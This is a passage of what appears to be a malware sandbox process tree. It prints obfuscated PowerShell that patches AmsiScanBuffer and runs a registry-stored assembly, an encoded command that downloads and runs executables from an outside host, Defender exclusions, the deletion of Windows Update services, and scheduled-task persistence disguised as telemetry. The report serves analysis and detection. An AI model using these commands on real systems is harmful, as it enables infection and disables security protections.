$_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+'i'+'n'+'3'+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](104)+''+'Z'+''+'P'+''+'K'+''+[Char](105)+''+[Char](107)+'V'+[Char](115)+''+[Char](102)+'U'+'J'+''+'W'+''+[Char](120)+'');$rviDmvRVaPWBqU=$hZPKikVsfUJWx.GetMethod(''+[Char](114)+''+[Char](118)+'i'+'D'+''+[Char](109)+''+[Char](118)+'R'+[Char](86)+'aP'+[Char](87)+''+[Char](66)+'qU',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+'a'+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OUeIcBMgvpnWPtisOcR=OqTqqnxpxUUB @([String])([IntPtr]);$mHnJbZMlaVJnsmgwHiPRYZ=OqTqqnxpxUUB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uJuZjRrbhBM=$hZPKikVsfUJWx.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+'n'+''+'e'+''+'l'+'3'+[Char](50)+'.'+[Char](100)+''+'l'+''+'l'+'')));$fgcLWpqdtOrFOy=$rviDmvRVaPWBqU.Invoke($Null,@([Object]$uJuZjRrbhBM,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+''+'r'+'y'+[Char](65)+'')));$jpPDZlMaxbgghMwkm=$rviDmvRVaPWBqU.Invoke($Null,@([Object]$uJuZjRrbhBM,[Object](''+[Char](86)+''+'i'+'rt'+[Char](117)+'a'+[Char](108)+'Pr'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$oHUBNYH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fgcLWpqdtOrFOy,$OUeIcBMgvpnWPtisOcR).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.d'+[Char](108)+''+[Char](108)+'');$OiGROqBAWDYyIbDzz=$rviDmvRVaPWBqU.Invoke($Null,@([Object]$oHUBNYH,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+'B'+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$sDESPqjCSQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jpPDZlMaxbgghMwkm,$mHnJbZMlaVJnsmgwHiPRYZ).Invoke($OiGROqBAWDYyIbDzz,[uint32]8,4,[ref]$sDESPqjCSQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$OiGROqBAWDYyIbDzz,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jpPDZlMaxbgghMwkm,$mHnJbZMlaVJnsmgwHiPRYZ).Invoke($OiGROqBAWDYyIbDzz,[uint32]8,0x20,[ref]$sDESPqjCSQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+'i'+'a'+''+'l'+'e'+[Char](114)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:308
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lhfTaSYdBzhe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xnIWBRsJAaVnYc,[Parameter(Position=1)][Type]$mwMutZuLsN)$BpOIlHWwJEL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+[Char](101)+'m'+'o'+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+'yD'+'e'+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+'i'+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$BpOIlHWwJEL.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+'e'+'c'+'i'+'alN'+'a'+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xnIWBRsJAaVnYc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+'ge'+'d'+'');$BpOIlHWwJEL.DefineMethod('I'+'n'+'v'+[Char](111)+''+'k'+'e','P'+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+'de'+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+'',$mwMutZuLsN,$xnIWBRsJAaVnYc).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');Write-Output $BpOIlHWwJEL.CreateType();}$BbHmNZoVgKBdX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+'32.'+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](66)+''+[Char](98)+''+'H'+''+[Char](109)+'N'+'Z'+''+[Char](111)+''+[Char](86)+'gKBd'+[Char](88)+'');$lrTXPONRIxKsYf=$BbHmNZoVgKBdX.GetMethod(''+[Char](108)+''+'r'+''+[Char](84)+'XPO'+'N'+''+[Char](82)+''+'I'+'x'+'K'+'s'+[Char](89)+''+[Char](102)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+'at'+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DMVNhzItWkqBrazkWJe=lhfTaSYdBzhe @([String])([IntPtr]);$dMBCgferDIRMUTOnuNiGNO=lhfTaSYdBzhe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nXCTDPmSRNb=$BbHmNZoVgKBdX.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'ndl'+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$XikazngSLGrLtK=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$nXCTDPmSRNb,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$ZGvnTpVMXLooDeWjE=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$nXCTDPmSRNb,[Object]('V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'ro'+'t'+''+[Char](101)+'c'+[Char](116)+'')));$QlVkDOb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XikazngSLGrLtK,$DMVNhzItWkqBrazkWJe).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+'l');$BojBoLOzWYxilGqYi=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$QlVkDOb,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+[Char](97)+'n'+[Char](66)+'u'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$SjaBeMAFIM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZGvnTpVMXLooDeWjE,$dMBCgferDIRMUTOnuNiGNO).Invoke($BojBoLOzWYxilGqYi,[uint32]8,4,[ref]$SjaBeMAFIM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BojBoLOzWYxilGqYi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZGvnTpVMXLooDeWjE,$dMBCgferDIRMUTOnuNiGNO).Invoke($BojBoLOzWYxilGqYi,[uint32]8,0x20,[ref]$SjaBeMAFIM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1852
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
PID:716 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"3⤵
- Creates scheduled task(s)
PID:4792 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3132
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1560
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2320
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2792
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:3184
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2520
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1020
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4784
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3876
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3452
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3452 -s 3922⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2304
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3344
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3344 -s 9842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3560
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3140
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2824 -
C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:3080
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 3046⤵
- Program crash
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3896 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:3436 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3992
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 2603⤵
- Program crash
PID:4956
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:492
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3532
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3052
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4648
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3612
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4932
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:4924
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4960
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2720
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4808
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1924
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Suspicious use of UnmapMainImage
PID:2700
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2352
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2180
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:8
-
